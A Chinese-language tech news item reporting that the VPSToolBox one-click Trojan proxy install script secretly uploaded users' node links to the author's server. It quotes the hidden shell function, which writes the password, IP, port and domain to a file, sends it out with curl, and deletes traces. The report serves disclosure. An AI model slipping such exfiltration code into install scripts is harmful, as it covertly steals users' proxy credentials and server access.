Trojan 知名一鍵腳本VPSToolBox 包含惡意程式碼- 科技資訊

V2EX (https://v2ex.com/t/928400) 用戶發現Trojan 一鍵腳本 VPSToolBox 包含惡意程式碼，會將用戶自建的Trojan 節點鏈接上傳至遠程服務器。

clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}

惡意程式碼位置：
https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494

據了解，該惡意程式碼已經存在超過一年時間。曾有用戶提出issue 指出該惡意程式碼，但被作者直接關閉了issue。

該作者在2022年4月14日的一次更新中使用了上傳trojan 節點鏈接的程式碼，替換了原來加入netdata 雲監控的程式碼。通過查找其他用戶克隆的倉庫證實了這一說法。在被曝光後不久，作者刪除了項目的GitHub 倉庫(https://github.com/johnrosen1/vpstoolbox)，該項目一共獲得了1.7k 個star。